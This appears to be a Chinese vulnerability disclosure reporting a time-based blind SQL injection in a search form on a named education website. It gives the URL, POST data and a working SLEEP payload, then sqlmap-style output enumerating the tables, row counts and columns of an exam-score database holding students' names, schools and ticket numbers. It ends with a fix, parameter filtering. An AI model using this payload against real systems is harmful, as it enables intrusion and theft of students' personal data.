注入点:http://app.eduuu.com/wulijs/search.php
POST数据:yid=10&con_id=17&exam_code=123123&name=123213&submit=
yid等参数存在注入。
---
Place: POST
Parameter: yid
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: yid=10' AND SLEEP(5) AND
'djDf'='djDf&con_id=17&exam_code=123123&name=123213&submit=
---
back-end DBMS: MySQL 5.0.11
Database: wljs_score
[11 tables]
+----------------+
| Sheet1 |
| user |
| aa |
| bak |
| contest |
| contest1 |
| score |
| score1 |
| score_20120507 |
| test |
| uear |
+----------------+
---
back-end DBMS: MySQL 5.0.11
Database: wljs_score
+-------+---------+
| Table | Entries |
+-------+---------+
| score | 8143 |
+-------+---------+
---
back-end DBMS: MySQL 5.0.11
Database: wljs_score
+--------+---------+
| Table | Entries |
+--------+---------+
| score1 | 2575 |
+--------+---------+
---
back-end DBMS: MySQL 5.0.11
Database: wljs_score
Table: score
[8 columns]
+--------------+--------------+
| Column | Type |
+--------------+--------------+
| con_id | int(8) |
| exam_code | varchar(32) |
| name | varchar(50) |
| sc_id | int(8) |
| school | varchar(50) |
| score | int(3) |
| score_detail | varchar(255) |
| status | tinyint(1) |
+--------------+--------------+
数据量在1万行左右,包括考生姓名学校准考证号详细成绩等。脱库后可被非法利用。
---
back-end DBMS: MySQL 5.0.11
Database: wljs_score
+-------+---------+
| Table | Entries |
+-------+---------+
| score | 8143 |
+-------+---------+
---
back-end DBMS: MySQL 5.0.11
Database: wljs_score
+--------+---------+
| Table | Entries |
+--------+---------+
| score1 | 2575 |
+--------+---------+
未下载任何数据。
#1、过滤参数